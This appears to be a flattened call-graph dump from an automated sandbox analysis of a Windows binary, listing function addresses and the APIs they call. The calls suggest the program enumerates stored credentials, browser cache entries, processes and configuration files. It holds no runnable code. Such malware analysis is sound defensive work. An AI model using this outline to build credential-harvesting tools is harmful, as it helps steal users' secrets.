calls 38435->38441 38437 44563c 38437->38422 38443 4087b3 338 API calls 38437->38443 38912 409b98 GetFileAttributesW 38438->38912 38439 40b6ef 252 API calls 38439->38376 38445 4456e2 38440->38445 38446 445c23 38441->38446 38442 445d83 38442->38376 38443->38437 38806 413fa6 _wcsicmp _wcsicmp 38445->38806 38450 409d1f 6 API calls 38446->38450 38448 445e12 38455 445e6b 38448->38455 38461 40b2cc 27 API calls 38448->38461 38453 445c37 38450->38453 38451 445aa1 38454 445b17 38451->38454 38469 445ab2 memset 38451->38469 38482 409d1f 6 API calls 38451->38482 38779 40add4 38451->38779 38784 445389 38451->38784 38793 40ae51 38451->38793 38452 4456eb 38457 4456fd memset memset memset memset 38452->38457 38458 4457ea 38452->38458 38459 445389 258 API calls 38453->38459 38887 40aebe 38454->38887 38914 445093 23 API calls 38455->38914 38807 409c70 wcscpy wcsrchr 38457->38807 38810 413d29 38458->38810 38464 445c47 38459->38464 38465 445e33 38461->38465 38471 40b2cc 27 API calls 38464->38471 38472 409d1f 6 API calls 38465->38472 38467 445e7e 38468 445f67 38467->38468 38477 40b2cc 27 API calls 38468->38477 38473 40b2cc 27 API calls 38469->38473 38475 445c53 38471->38475 38476 445e47 38472->38476 38473->38451 38474 409c70 2 API calls 38478 44577e 38474->38478 38479 409d1f 6 API calls 38475->38479 38913 409b98 GetFileAttributesW 38476->38913 38481 445f73 38477->38481 38483 409c70 2 API calls 38478->38483 38484 445c67 38479->38484 38486 409d1f 6 API calls 38481->38486 38482->38451 38487 44578d 38483->38487 38488 445389 258 API calls 38484->38488 38485 445e56 38485->38455 38491 445e83 memset 38485->38491 38489 445f87 38486->38489 38487->38458 38494 40b2cc 27 API calls 38487->38494 38488->38350 38917 409b98 GetFileAttributesW 38489->38917 38493 40b2cc 27 API calls 38491->38493 38496 445eab 38493->38496 38497 4457a8 38494->38497 38495->38376 38495->38439 38498 409d1f 6 API calls 38496->38498 38499 409d1f 6 API calls 38497->38499 38500 445ebf 38498->38500 38501 4457b8 38499->38501 38502 
40ae18 9 API calls 38500->38502 38809 409b98 GetFileAttributesW 38501->38809 38512 445ef5 38502->38512 38504 4457c7 38504->38458 38506 4087b3 338 API calls 38504->38506 38505 40ae51 9 API calls 38505->38512 38506->38458 38507 445f5c 38509 40aebe FindClose 38507->38509 38508 40add4 2 API calls 38508->38512 38509->38468 38510 40b2cc 27 API calls 38510->38512 38511 409d1f 6 API calls 38511->38512 38512->38505 38512->38507 38512->38508 38512->38510 38512->38511 38514 445f3a 38512->38514 38915 409b98 GetFileAttributesW 38512->38915 38916 445093 23 API calls 38514->38916 38516->38313 38517->38315 38518->38313 38519->38308 38521 40c775 38520->38521 38918 40b1ab free free 38521->38918 38523 40c788 38919 40b1ab free free 38523->38919 38525 40c790 38920 40b1ab free free 38525->38920 38527 40c798 38528 40aa04 free 38527->38528 38529 40c7a0 38528->38529 38921 40c274 memset 38529->38921 38534 40a8ab 9 API calls 38535 40c7c3 38534->38535 38536 40a8ab 9 API calls 38535->38536 38537 40c7d0 38536->38537 38950 40c3c3 38537->38950 38541 40c877 38550 40bdb0 38541->38550 38542 40c86c 38992 4053fe 39 API calls 38542->38992 38544 40c7e5 38544->38541 38544->38542 38549 40c634 49 API calls 38544->38549 38975 40a706 38544->38975 38549->38544 39160 404363 38550->39160 38553 40bf5d 39180 40440c 38553->39180 38555 40bdee 38555->38553 38558 40b2cc 27 API calls 38555->38558 38556 40bddf CredEnumerateW 38556->38555 38559 40be02 wcslen 38558->38559 38559->38553 38562 40be1e 38559->38562 38560 40be26 wcsncmp 38560->38562 38562->38553 38562->38560 38564 40be7d memset 38562->38564 38565 40bea7 memcpy 38562->38565 38566 40bf11 wcschr 38562->38566 38567 40b2cc 27 API calls 38562->38567 38569 40bf43 LocalFree 38562->38569 39183 40bd5d 28 API calls 38562->39183 39184 404423 38562->39184 38564->38562 38564->38565 38565->38562 38565->38566 38566->38562 38568 40bef6 _wcsnicmp 38567->38568 38568->38562 38568->38566 38569->38562 38570 4135f7 39197 4135e0 38570->39197 38573 40b2cc 27 API calls 38574 41360d 
38573->38574 38575 40a804 8 API calls 38574->38575 38576 413613 38575->38576 38577 41361b 38576->38577 38578 41363e 38576->38578 38579 40b273 27 API calls 38577->38579 38580 4135e0 FreeLibrary 38578->38580 38581 413625 GetProcAddress 38579->38581 38582 413643 38580->38582 38581->38578 38583 413648 38581->38583 38582->38336 38584 413658 38583->38584 38585 4135e0 FreeLibrary 38583->38585 38584->38336 38586 413666 38585->38586 38586->38336 39200 4449b9 38587->39200 38590 444c1f 38590->38323 38591 4449b9 42 API calls 38593 444b4b 38591->38593 38592 444c15 38594 4449b9 42 API calls 38592->38594 38593->38592 39221 444972 GetVersionExW 38593->39221 38594->38590 38596 444b99 memcmp 38601 444b8c 38596->38601 38597 444c0b 39225 444a85 42 API calls 38597->39225 38601->38596 38601->38597 39222 444aa5 42 API calls 38601->39222 39223 40a7a0 GetVersionExW 38601->39223 39224 444a85 42 API calls 38601->39224 38604 40399d 38603->38604 39226 403a16 38604->39226 38606 403a09 39240 40b1ab free free 38606->39240 38608 4039a3 38608->38606 38612 4039f4 38608->38612 39237 40a02c CreateFileW 38608->39237 38609 403a12 wcsrchr 38609->38339 38612->38606 38613 4099c6 2 API calls 38612->38613 38613->38606 38615 414c2e 16 API calls 38614->38615 38616 404048 38615->38616 38617 414c2e 16 API calls 38616->38617 38618 404056 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 404073 38619->38620 38621 409d1f 6 API calls 38620->38621 38622 40408e 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4040a6 38623->38624 38625 403af5 20 API calls 38624->38625 38626 4040ba 38625->38626 38627 403af5 20 API calls 38626->38627 38628 4040cb 38627->38628 39267 40414f memset 38628->39267 38630 404140 39281 40b1ab free free 38630->39281 38632 4040ec memset 38635 4040e0 38632->38635 38633 404148 38633->38396 38634 4099c6 2 API calls 38634->38635 38635->38630 38635->38632 38635->38634 38636 40a8ab 9 API calls 38635->38636 38636->38635 39294 40a6e6 WideCharToMultiByte 38637->39294 38639 4087ed 39295 4095d9 
memset 38639->39295 38642 408953 38642->38396 38643 408809 memset memset memset memset memset 38644 40b2cc 27 API calls 38643->38644 38645 4088a1 38644->38645 38646 409d1f 6 API calls 38645->38646 38647 4088b1 38646->38647 38648 40b2cc 27 API calls 38647->38648 38649 4088c0 38648->38649 38650 409d1f 6 API calls 38649->38650 38651 4088d0 38650->38651 38652 40b2cc 27 API calls 38651->38652 38653 4088df 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 4088ef 38654->38655 38656 40b2cc 27 API calls 38655->38656 38657 4088fe 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 40890e 38658->38659 38660 40b2cc 27 API calls 38659->38660 38661 40891d 38660->38661 38662 409d1f 6 API calls 38661->38662 38663 40892d 38662->38663 39314 409b98 GetFileAttributesW 38663->39314 38665 40893e 38666 408943 38665->38666 38667 408958 38665->38667 39315 407fdf 75 API calls 38666->39315 39316 409b98 GetFileAttributesW 38667->39316 38670 408964 38671 408969 38670->38671 38672 40897b 38670->38672 39318 409b98 GetFileAttributesW 38672->39318 38689 40b633 free 38688->38689 38690 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38689->38690 38691 413f00 Process32NextW 38690->38691 38692 413da5 OpenProcess 38691->38692 38693 413f17 CloseHandle 38691->38693 38694 413df3 memset 38692->38694 38697 413eb0 38692->38697 38693->38434 39616 413f27 38694->39616 38696 413ebf free 38696->38697 38697->38691 38697->38696 38698 4099f4 3 API calls 38697->38698 38698->38697 38700 413e37 GetModuleHandleW 38701 413e1f 38700->38701 38702 413e46 GetProcAddress 38700->38702 38701->38700 38703 413e6a QueryFullProcessImageNameW 38701->38703 39621 413959 38701->39621 39637 413ca4 38701->39637 38702->38701 38703->38701 38705 413ea2 CloseHandle 38705->38697 38707 414c2e 16 API calls 38706->38707 38708 403eb7 38707->38708 38709 414c2e 16 API calls 38708->38709 38710 403ec5 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 403ee2 38711->38712 38713 409d1f 6 API calls 38712->38713 38714 403efd 
38713->38714 38715 409d1f 6 API calls 38714->38715 38716 403f15 38715->38716 38717 403af5 20 API calls 38716->38717 38718 403f29 38717->38718 38719 403af5 20 API calls 38718->38719 38720 403f3a 38719->38720 38721 40414f 33 API calls 38720->38721 38722 403f4f 38721->38722 38723 403faf 38722->38723 38724 403f5b memset 38722->38724 38727 4099c6 2 API calls 38722->38727 38728 40a8ab 9 API calls 38722->38728 39651 40b1ab free free 38723->39651 38724->38722 38726 403fb7 38726->38380 38727->38722 38728->38722 38730 414c2e 16 API calls 38729->38730 38731 403d26 38730->38731 38732 414c2e 16 API calls 38731->38732 38733 403d34 38732->38733 38734 409d1f 6 API calls 38733->38734 38735 403d51 38734->38735 38736 409d1f 6 API calls 38735->38736 38737 403d6c 38736->38737 38738 409d1f 6 API calls 38737->38738 38739 403d84 38738->38739 38740 403af5 20 API calls 38739->38740 38741 403d98 38740->38741 38742 403af5 20 API calls 38741->38742 38743 403da9 38742->38743 38744 40414f 33 API calls 38743->38744 38745 403dbe 38744->38745 38746 403e1e 38745->38746 38747 403dca memset 38745->38747 38750 4099c6 2 API calls 38745->38750 38751 40a8ab 9 API calls 38745->38751 39652 40b1ab free free 38746->39652 38747->38745 38749 403e26 38749->38384 38750->38745 38751->38745 38753 414b81 9 API calls 38752->38753 38754 414c40 38753->38754 38755 414c73 memset 38754->38755 39653 409cea 38754->39653 38756 414c94 38755->38756 39656 414592 RegOpenKeyExW 38756->39656 38760 414c64 38760->38374 38761 414cc1 38762 414cf4 wcscpy 38761->38762 39657 414bb0 wcscpy 38761->39657 38762->38760 38764 414cd2 39658 4145ac RegQueryValueExW 38764->39658 38766 414ce9 RegCloseKey 38766->38762 38768 409d62 38767->38768 38769 409d43 wcscpy 38767->38769 38768->38416 38770 409719 2 API calls 38769->38770 38771 409d51 wcscat 38770->38771 38771->38768 38773 40aebe FindClose 38772->38773 38774 40ae21 38773->38774 38775 4099c6 2 API calls 38774->38775 38776 40ae35 38775->38776 38777 409d1f 6 API calls 38776->38777 38778 40ae49 
38777->38778 38778->38451 38780 40ade0 38779->38780 38781 40ae0f 38779->38781 38780->38781 38782 40ade7 wcscmp 38780->38782 38781->38451 38782->38781 38783 40adfe wcscmp 38782->38783 38783->38781 38785 40ae18 9 API calls 38784->38785 38791 4453c4 38785->38791 38786 40ae51 9 API calls 38786->38791 38787 4453f3 38789 40aebe FindClose 38787->38789 38788 40add4 2 API calls 38788->38791 38790 4453fe 38789->38790 38790->38451 38791->38786 38791->38787 38791->38788 38792 445403 253 API calls 38791->38792 38792->38791 38794 40ae7b FindNextFileW 38793->38794 38795 40ae5c FindFirstFileW 38793->38795 38796 40ae94 38794->38796 38797 40ae8f 38794->38797 38795->38796 38798 40aeb6 38796->38798 38799 409d1f 6 API calls 38796->38799 38800 40aebe FindClose 38797->38800 38798->38451 38799->38798 38800->38796 38801->38358 38802->38383 38803->38437 38804->38418 38805->38418 38806->38452 38808 409c89 38807->38808 38808->38474 38809->38504 38811 413d39 38810->38811 38812 413d2f FreeLibrary 38810->38812 38813 40b633 free 38811->38813 38812->38811 38814 413d42 38813->38814 38815 40b633 free 38814->38815 38816 413d4a 38815->38816 38816->38331 38817->38335 38818->38386 38819->38400 38821 44db70 38820->38821 38822 40b6fc memset 38821->38822 38823 409c70 2 API calls 38822->38823 38824 40b732 wcsrchr 38823->38824 38825 40b743 38824->38825 38826 40b746 memset 38824->38826 38825->38826 38827 40b2cc 27 API calls 38826->38827 38828 40b76f 38827->38828 38829 409d1f 6 API calls 38828->38829 38830 40b783 38829->38830 39659 409b98 GetFileAttributesW 38830->39659 38832 40b792 38833 40b7c2 38832->38833 38834 409c70 2 API calls 38832->38834 39660 40bb98 38833->39660 38836 40b7a5 38834->38836 38838 40b2cc 27 API calls 38836->38838 38841 40b7b2 38838->38841 38839 40b837 CloseHandle 38843 40b83e memset 38839->38843 38840 40b817 39694 409a45 GetTempPathW 38840->39694 38845 409d1f 6 API calls 38841->38845 39693 40a6e6 WideCharToMultiByte 38843->39693 38845->38833 38846 40b827 CopyFileW 38846->38843 38847 
40b866 38848 444432 121 API calls 38847->38848 38849 40b879 38848->38849 38850 40bad5 38849->38850 38851 40b273 27 API calls 38849->38851 38852 40baeb 38850->38852 38853 40bade DeleteFileW 38850->38853 38854 40b89a 38851->38854 38855 40b04b ??3@YAXPAX 38852->38855 38853->38852 38856 438552 134 API calls 38854->38856 38857 40baf3 38855->38857 38858 40b8a4 38856->38858 38857->38410 38859 40bacd 38858->38859 38861 4251c4 137 API calls 38858->38861 38860 443d90 111 API calls 38859->38860 38860->38850 38884 40b8b8 38861->38884 38862 40bac6 39706 424f26 123 API calls 38862->39706 38863 40b8bd memset 39697 425413 17 API calls 38863->39697 38866 425413 17 API calls 38866->38884 38869 40a71b MultiByteToWideChar 38869->38884 38870 40a734 MultiByteToWideChar 38870->38884 38873 40b9b5 memcmp 38873->38884 38874 4099c6 2 API calls 38874->38884 38875 404423 37 API calls 38875->38884 38877 40bb3e memset memcpy 39707 40a734 MultiByteToWideChar 38877->39707 38878 4251c4 137 API calls 38878->38884 38881 40bb88 LocalFree 38881->38884 38884->38862 38884->38863 38884->38866 38884->38869 38884->38870 38884->38873 38884->38874 38884->38875 38884->38877 38884->38878 38885 40ba5f memcmp 38884->38885 39698 4253ef 16 API calls 38884->39698 39699 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38884->39699 39700 4253af 17 API calls 38884->39700 39701 4253cf 17 API calls 38884->39701 39702 447280 memset 38884->39702 39703 447960 memset memcpy memcpy memcpy 38884->39703 39704 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38884->39704 39705 447920 memcpy memcpy memcpy 38884->39705 38885->38884 38886->38412 38888 40aed1 38887->38888 38889 40aec7 FindClose 38887->38889 38888->38344 38889->38888 38891 4099d7 38890->38891 38892 4099da memcpy 38890->38892 38891->38892 38892->38395 38894 40b2cc 27 API calls 38893->38894 38895 44543f 38894->38895 38896 409d1f 6 API calls 38895->38896 38897 44544f 38896->38897 39803 409b98 GetFileAttributesW 38897->39803 38899 44545e 38900 445476 38899->38900 38901 40b6ef 252 
API calls 38899->38901 38902 40b2cc 27 API calls 38900->38902 38901->38900 38903 445482 38902->38903 38904 409d1f 6 API calls 38903->38904 38905 445492 38904->38905 39804 409b98 GetFileAttributesW 38905->39804 38907 4454a1 38908 4454b9 38907->38908 38909 40b6ef 252 API calls 38907->38909 38908->38426 38909->38908 38910->38425 38911->38442 38912->38448 38913->38485 38914->38467 38915->38512 38916->38512 38917->38495 38918->38523 38919->38525 38920->38527 38922 414c2e 16 API calls 38921->38922 38923 40c2ae 38922->38923 38993 40c1d3 38923->38993 38928 40c3be 38945 40a8ab 38928->38945 38929 40afcf 2 API calls 38930 40c2fd FindFirstUrlCacheEntryW 38929->38930 38931 40c3b6 38930->38931 38932 40c31e wcschr 38930->38932 38933 40b04b ??3@YAXPAX 38931->38933 38934 40c331 38932->38934 38935 40c35e FindNextUrlCacheEntryW 38932->38935 38933->38928 38936 40a8ab 9 API calls 38934->38936 38935->38932 38937 40c373 GetLastError 38935->38937 38940 40c33e wcschr 38936->38940 38938 40c3ad FindCloseUrlCache 38937->38938 38939 40c37e 38937->38939 38938->38931 38941 40afcf 2 API calls 38939->38941 38940->38935 38942 40c34f 38940->38942 38943 40c391 FindNextUrlCacheEntryW 38941->38943 38944 40a8ab 9 API calls 38942->38944 38943->38932 38943->38938 38944->38935 39087 40a97a 38945->39087 38948 40a8cc 38948->38534 38949 40a8d0 7 API calls 38949->38948 39092 40b1ab free free 38950->39092 38952 40c3dd 38953 40b2cc 27 API calls 38952->38953 38954 40c3e7 38953->38954 39093 414592 RegOpenKeyExW 38954->39093 38956 40c3f4 38957 40c50e 38956->38957 38958 40c3ff 38956->38958 38972 405337 38957->38972 38959 40a9ce 4 API calls 38958->38959 38960 40c418 memset 38959->38960 39094 40aa1d 38960->39094 38963 40c471 38965 40c47a _wcsupr 38963->38965 38964 40c505 RegCloseKey 38964->38957 38966 40a8d0 7 API calls 38965->38966 38967 40c498 38966->38967 38968 40a8d0 7 API calls 38967->38968 38969 40c4ac memset 38968->38969 38970 40aa1d 38969->38970 38971 40c4e4 RegEnumValueW 38970->38971 38971->38964 38971->38965 
39096 405220 38972->39096 38976 4099c6 2 API calls 38975->38976 38977 40a714 _wcslwr 38976->38977 38978 40c634 38977->38978 39153 405361 38978->39153 38981 40c65c wcslen 39156 4053b6 39 API calls 38981->39156 38982 40c71d wcslen 38982->38544 38984 40c713 39159 4053df 39 API calls 38984->39159 38985 40c677 38985->38984 39157 40538b 39 API calls 38985->39157 38988 40c6a5 38988->38984 38989 40c6a9 memset 38988->38989 38990 40c6d3 38989->38990 39158 40c589 43 API calls 38990->39158 38992->38541 38994 40ae18 9 API calls 38993->38994 39000 40c210 38994->39000 38995 40ae51 9 API calls 38995->39000 38996 40c264 38997 40aebe FindClose 38996->38997 38999 40c26f 38997->38999 38998 40add4 2 API calls 38998->39000 39005 40e5ed memset memset 38999->39005 39000->38995 39000->38996 39000->38998 39001 40c231 _wcsicmp 39000->39001 39002 40c1d3 35 API calls 39000->39002 39001->39000 39003 40c248 39001->39003 39002->39000 39018 40c084 22 API calls 39003->39018 39006 414c2e 16 API calls 39005->39006 39007 40e63f 39006->39007 39008 409d1f 6 API calls 39007->39008 39009 40e658 39008->39009 39019 409b98 GetFileAttributesW 39009->39019 39011 40e667 39012 40e680 39011->39012 39014 409d1f 6 API calls 39011->39014 39020 409b98 GetFileAttributesW 39012->39020 39014->39012 39015 40e68f 39016 40c2d8 39015->39016 39021 40e4b2 39015->39021 39016->38928 39016->38929 39018->39000 39019->39011 39020->39015 39042 40e01e 39021->39042 39023 40e593 39025 40e5b0 39023->39025 39026 40e59c DeleteFileW 39023->39026 39024 40e521 39024->39023 39065 40e175 39024->39065 39027 40b04b ??3@YAXPAX 39025->39027 39026->39025 39028 40e5bb 39027->39028 39030 40e5c4 CloseHandle 39028->39030 39031 40e5cc 39028->39031 39030->39031 39033 40b633 free 39031->39033 39032 40e573 39034 40e584 39032->39034 39035 40e57c CloseHandle 39032->39035 39036 40e5db 39033->39036 39086 40b1ab free free 39034->39086 39035->39034 39039 40b633 free 39036->39039 39038 40e540 39038->39032 39085 40e2ab 30 API calls 39038->39085 39040 40e5e3 
39039->39040 39040->39016 39043 406214 22 API calls 39042->39043 39044 40e03c 39043->39044 39045 40e16b 39044->39045 39046 40dd85 75 API calls 39044->39046 39045->39024 39047 40e06b 39046->39047 39047->39045 39048 40afcf ??2@YAPAXI ??3@YAXPAX 39047->39048 39049 40e08d OpenProcess 39048->39049 39050 40e0a4 GetCurrentProcess DuplicateHandle 39049->39050 39054 40e152 39049->39054 39051 40e0d0 GetFileSize 39050->39051 39052 40e14a CloseHandle 39050->39052 39055 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39051->39055 39052->39054 39053 40e160 39057 40b04b ??3@YAXPAX 39053->39057 39054->39053 39056 406214 22 API calls 39054->39056 39058 40e0ea 39055->39058 39056->39053 39057->39045 39059 4096dc CreateFileW 39058->39059 39060 40e0f1 CreateFileMappingW 39059->39060 39061 40e140 CloseHandle CloseHandle 39060->39061 39062 40e10b MapViewOfFile 39060->39062 39061->39052 39063 40e13b CloseHandle 39062->39063 39064 40e11f WriteFile UnmapViewOfFile 39062->39064 39063->39061 39064->39063 39066 40e18c 39065->39066 39067 406b90 11 API calls 39066->39067 39068 40e19f 39067->39068 39069 40e1a7 memset 39068->39069 39070 40e299 39068->39070 39075 40e1e8 39069->39075 39071 4069a3 ??3@YAXPAX free 39070->39071 39072 40e2a4 39071->39072 39072->39038 39073 406e8f 13 API calls 39073->39075 39074 406b53 SetFilePointerEx ReadFile 39074->39075 39075->39073 39075->39074 39076 40e283 39075->39076 39077 40dd50 _wcsicmp 39075->39077 39081 40742e 8 API calls 39075->39081 39082 40aae3 wcslen wcslen _memicmp 39075->39082 39083 40e244 _snwprintf 39075->39083 39078 40e291 39076->39078 39079 40e288 free 39076->39079 39077->39075 39080 40aa04 free 39078->39080 39079->39078 39080->39070 39081->39075 39082->39075 39084 40a8d0 7 API calls 39083->39084 39084->39075 39085->39038 39086->39023 39089 40a980 39087->39089 39088 40a8bb 39088->38948 39088->38949 39089->39088 39090 40a995 _wcsicmp 39089->39090 39091 40a99c wcscmp 39089->39091 39090->39089 39091->39089 39092->38952 39093->38956 39095 
40aa23 RegEnumValueW 39094->39095 39095->38963 39095->38964 39097 405335 39096->39097 39098 40522a 39096->39098 39097->38544 39099 40b2cc 27 API calls 39098->39099 39100 405234 39099->39100 39101 40a804 8 API calls 39100->39101 39102 40523a 39101->39102 39141 40b273 39102->39141 39104 405248 _mbscpy _mbscat GetProcAddress 39105 40b273 27 API calls 39104->39105 39106 405279 39105->39106 39144 405211 GetProcAddress 39106->39144 39108 405282 39109 40b273 27 API calls 39108->39109 39110 40528f 39109->39110 39145 405211 GetProcAddress 39110->39145 39112 405298 39113 40b273 27 API calls 39112->39113 39114 4052a5 39113->39114 39146 405211 GetProcAddress 39114->39146 39116 4052ae 39117 40b273 27 API calls 39116->39117 39118 4052bb 39117->39118 39147 405211 GetProcAddress 39118->39147 39120 4052c4 39121 40b273 27 API calls 39120->39121 39122 4052d1 39121->39122 39148 405211 GetProcAddress 39122->39148 39124 4052da 39125 40b273 27 API calls 39124->39125 39126 4052e7 39125->39126 39149 405211 GetProcAddress 39126->39149 39128 4052f0 39129 40b273 27 API calls 39128->39129 39130 4052fd 39129->39130 39150 405211 GetProcAddress 39130->39150 39132 405306 39133 40b273 27 API calls 39132->39133 39134 405313 39133->39134 39151 405211 GetProcAddress 39134->39151 39136 40531c 39137 40b273 27 API calls 39136->39137 39138 405329 39137->39138 39152 405211 GetProcAddress 39138->39152 39140 405332 39140->39097 39142 40b58d 27 API calls 39141->39142 39143 40b18c 39142->39143 39143->39104 39144->39108 39145->39112 39146->39116 39147->39120 39148->39124 39149->39128 39150->39132 39151->39136 39152->39140 39154 405220 39 API calls 39153->39154 39155 405369 39154->39155 39155->38981 39155->38982 39156->38985 39157->38988 39158->38984 39159->38982 39161 40440c FreeLibrary 39160->39161 39162 40436d 39161->39162 39163 40a804 8 API calls 39162->39163 39164 404377 39163->39164 39165 404383 39164->39165 39166 404405 39164->39166 39167 40b273 27 API calls 39165->39167 39166->38553 39166->38555 
39166->38556 39168 40438d GetProcAddress 39167->39168 39169 40b273 27 API calls 39168->39169 39170 4043a7 GetProcAddress 39169->39170 39171 40b273 27 API calls 39170->39171 39172 4043ba GetProcAddress 39171->39172 39173 40b273 27 API calls 39172->39173 39174 4043ce GetProcAddress 39173->39174 39175 40b273 27 API calls 39174->39175 39176 4043e2 GetProcAddress 39175->39176 39177 4043f1 39176->39177 39178 4043f7 39177->39178 39179 40440c FreeLibrary 39177->39179 39178->39166 39179->39166 39181 404413 FreeLibrary 39180->39181 39182 40441e 39180->39182 39181->39182 39182->38570 39183->38562 39185 40442e 39184->39185 39186 40447e 39184->39186 39187 40b2cc 27 API calls 39185->39187 39186->38562 39188 404438 39187->39188 39189 40a804 8 API calls 39188->39189 39190 40443e 39189->39190 39191 404445 39190->39191 39192 404467 39190->39192 39193 40b273 27 API calls 39191->39193 39192->39186 39194 404475 FreeLibrary 39192->39194 39195 40444f GetProcAddress 39193->39195 39194->39186 39195->39192 39196 404460 39195->39196 39196->39192 39198 4135f6 39197->39198 39199 4135eb FreeLibrary 39197->39199 39198->38573 39199->39198 39201 4449c4 39200->39201 39202 444a52 39200->39202 39203 40b2cc 27 API calls 39201->39203 39202->38590 39202->38591 39204 4449cb 39203->39204 39205 40a804 8 API calls 39204->39205 39206 4449d1 39205->39206 39207 40b273 27 API calls 39206->39207 39208 4449dc GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4449f3 GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 444a04 GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 444a15 GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 444a26 GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 444a37 GetProcAddress 39217->39218 39219 40b273 27 API calls 39218->39219 39220 444a48 GetProcAddress 39219->39220 39220->39202 39221->38601 39222->38601 39223->38601 39224->38601 39225->38592 39227 403a29 39226->39227 
Call graph (Joe Sandbox IDA Plugin), rendered on the original page as an interactive graph of which only the flattened node list survived extraction. Nodes are function addresses in the 0x40xxxx-0x44xxxx range, each annotated either with the imports it calls directly or with the number of API calls reachable through it. The API-calling nodes recoverable from the graph, grouped by the routine they hang off:
• 0x4039ca CompareFileTime; 0x40a051 GetFileTime, CloseHandle; 0x409b98 GetFileAttributesW; 0x409d1f (6 API calls); 0x40a8d0 (7 API calls)
• 0x403bed memset x2; 0x403a3f memset; 0x403c3f and 0x403c68 wcscat (after 0x414c2e, 16 API calls, and 0x409719, 2 API calls); 0x40b1ab free x2
• 0x403af5 (20 API calls) loops over 0x40ae18 and 0x40ae51 (9 API calls each), 0x40add4 wcscmp x2, 0x40aebe FindClose
• 0x4041a7 (6 API calls); 0x40425e memset; 0x404296 wcscpy; 0x4042b6 memset x2, _snwprintf, wcscpy; 0x40a8ab (9 API calls); 0x414842 -> 0x41443e: 0x4144a3 GetPrivateProfileStringW, 0x414455 wcschr, 0x414463 _snwprintf, 0x414495 WritePrivateProfileStringW
• 0x409615 path: 0x40b2cc (27 API calls), 0x409b98 GetFileAttributesW, 0x4091b8 memset -> 0x40a6e6 WideCharToMultiByte, 0x444432 -> 0x4438b5 (0x415378 memcpy x2; 0x4154e2, 0x415700, 0x41975c, 0x418981 10 API calls each; 0x443970 memset), 0x415a7e memset, 0x4444b9 memcpy, 0x409409 and 0x409421 memcmp, 0x409529 (72), 0x408f2f (77), 0x438552 (134), 0x438270 (134), 0x4384e9 (135), 0x4251c4 (137), 0x424f26 (123), 0x424f74 (124), 0x42569b (125), 0x443d90 (111), 0x444316 (18), 0x432d4e memset x2, memcpy, 0x4253af and 0x4253cf (17), 0x416935 and 0x415c7d (16), 0x4442e6, 0x4446ea, 0x41703f, 0x416760, 0x424eea (11 each)
• 0x413f37 K32GetModuleFileNameExW; 0x413f5f GetProcAddress x5 (after 0x40a804, 8 API calls)
• 0x413969 wcscpy and 0x41396c wcschr; 0x4097f7 wcslen x2, _memicmp; 0x4139a4 and 0x4139ec memset; 0x409dd5 GetWindowsDirectoryW, wcscpy; 0x4139c9 wcscpy, wcscat; 0x413a11 memcpy, wcscat; 0x413a31 wcscpy
• 0x413cb0 GetModuleHandleW -> 0x413cbf GetProcAddress -> 0x413ce3 GetProcessTimes
• 0x409cf9 GetVersionExW
• 0x40bba5 path: 0x40cc26 (0x4096c3 CreateFileW, 0x40cc3d GetFileSize, 0x40afcf 2 API calls, 0x40a2ef ReadFile, 0x40ab4a and 0x40ab7c MultiByteToWideChar, 0x40cc95 CloseHandle, 0x40b04b ??3@YAXPAX), 0x40cf04 (17 API calls), 0x40ccf0 and 0x40cd26 _wcsicmp, 0x40ccb4 -> 0x40aa29 (6 API calls), 0x40bc61 memset x2, WideCharToMultiByte, 0x40103c strlen, 0x40bcd0 memcmp, 0x404423 (37 API calls), 0x40bd1f memcpy, 0x40bd3a LocalFree, 0x40cd4b (14 API calls: 0x40aa38 and 0x40aa71 wcslen, 0x40abb7 wcslen, memmove, 0x40aa51 memcpy, 0x40a9ce and 0x40d00b malloc, memcpy, free x2, 0x40aa04 and 0x40b633 free), 0x40cc0c (4 API calls), 0x40b7d4 memset, CreateFileW
• 0x409a66 GetWindowsDirectoryW; 0x409a74 GetTempFileNameW
• 0x44deb5 FreeLibrary
• 0x4148b6 FindResourceW -> 0x4148cf SizeofResource -> 0x4148e0 LoadResource -> 0x4148ee LockResource; 0x41493c EnumResourceNamesW
• 0x415304 free
• 0x441b3f -> 0x43a9f6 and 0x42a115 clusters: helper nodes reported at 11 to 163 API calls each (0x439811, 0x44081d, 0x438c4e, 0x43a87a, 0x42db80, 0x42d836, 0x42d71d at 163; 0x42e1c0, 0x42e199, 0x42b13b, 0x42a0a8, 0x4312d0 at 147; 0x42f50e at 138; 0x41f638 at 104; 0x41bc3b at 101; 0x41f3b1 at 90; 0x41f398, 0x41c295, 0x41edad, 0x41ee6b at 86; 0x41c8df at 56); memset/memcpy wrappers 0x4386af, 0x441409, 0x43aa34, 0x43ae3a, 0x4397fd, 0x42c02e, 0x42bbd5, 0x42370b, 0x42374a, 0x42be4c, 0x42b5b5, 0x42bfcf, 0x415aa4, 0x416172, 0x416561, 0x41c635, 0x41b1ca; 0x415d23 __aullrem, __aulldvrm; 0x4300e8 (3 API calls); 0x41c06f, 0x41f1f5, 0x41f21b, 0x41f28e memcmp
• 0x4287c1 cluster: 0x42013a (97 API calls), 0x420244 (97), 0x41e466 (97), 0x424251 (120), 0x42413a (90), 0x41fd5e (86), 0x41bf99 (86), 0x41a453 (86), 0x422b84 (15), 0x422640 (13), 0x4226e0 (12), 0x41dc14 (19); memset/memcpy wrappers 0x422aeb, 0x4227f0, 0x422b5d, 0x418c63, 0x418a6d, 0x41a223, 0x41ac3f, 0x41acc0, 0x41bf24; 0x41accd memcpy
• 0x4175ed: 0x417570 SetFilePointer (0x41759c and 0x4175a8 GetLastError), 0x41760a ReadFile (0x417627 GetLastError, 0x41763e memset)
• 0x417bc5: 0x417bf6 UnmapViewOfFile, CloseHandle; 0x41851e (20 API calls); 0x4175d6 CloseHandle, where 0x4175ce Sleep loops back to the CloseHandle node
